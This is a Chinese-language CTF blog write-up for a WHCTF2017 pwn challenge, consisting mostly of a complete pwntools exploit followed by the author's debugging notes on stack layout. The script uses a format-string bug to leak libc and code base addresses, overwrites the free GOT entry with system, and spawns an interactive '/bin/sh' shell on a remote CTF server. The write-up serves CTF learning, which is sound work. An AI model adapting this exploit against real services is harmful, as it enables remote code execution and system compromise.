看题目以为容易,结果进入看到是难度八分,不过先硬着头皮抄一下别人的writeup吧。首先上exp
from pwn import *
r = remote("61.147.171.105", 53146)
elf = ELF('./pwn1')
libc = ELF('./libc.so.6')
def echo(payload):
print r.recvuntil("Input Your Code:\n")
r.sendline('1')
print r.recvuntil("Welcome To WHCTF2017:\n")
r.sendline(payload)
def setName(name):
print r.recvuntil("Input Your Code:\n")
r.sendline('2')
print r.recvuntil("Input Your Name:\n")
r.sendline(name)
setName("1")
padding_num = 0x7f8 - 0x410
payload = 'a' * padding_num + 'bb%397$p'
echo(payload)
print r.recvuntil("0x")
main_return = int(r.recvuntil('\n').strip(), 16)
libc_base = (main_return - 0xF0) - libc.symbols['__libc_start_main']
system = libc_base + libc.symbols['system']
free = libc_base + libc.symbols['free']
print "system:", hex(system)
print "free:", hex(free)
payload = 'a' * padding_num + 'bb%396$p'
echo(payload)
print r.recvuntil("0x")
init_addr = int(r.recvuntil('\n').strip(), 16)
code_base = init_addr - 0xda0
print "code base:", hex(code_base)
free_got = code_base + elf.got['free']
print "free got:", hex(free_got)
num = (system & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got)
echo(payload)
num = ((system >> 16) & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got + 2)
echo(payload)
setName('/bin/sh')
r.interactive()
用python2跑一下,直接跑起来取得了shell,然后flag在哪里啊
首先动态调试,看了看函数执行顺序,
程序一开始执行就进入了start函数,
start调用libc里面的libc_start_main函数,把rpb入栈,rbp指向0007FFE9F36C8E8这个地址存了000055BAAF800D9F,是init函数的地址,开了EIP,所以地址会变但是后三位不变
libc_start_main函数调用init函数,init执行完又回到libc-start-main
libc-start-main函数调用main函数,main函数的返回地址___libc_start_main+F0,rbp就指向了init函数的起始地址(里面存的是代码,而不是一般main函数调用其他函数时候的栈底里面存的是参数之类的。),如果是单步调试的话,这里只会显示一个地址,不会显示与libc-start-main的相对位置。
所以main函数栈底的位置一般都是init函数和libc-start-main函数,利用这个就可以像writeup里面算出来函数和libc的基址。
(字符串的结尾是0a00)
第一次输入payload的时候,必须在1000个a后面加上bb再加%397$p,负责就不能输出地址,不知为什么
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
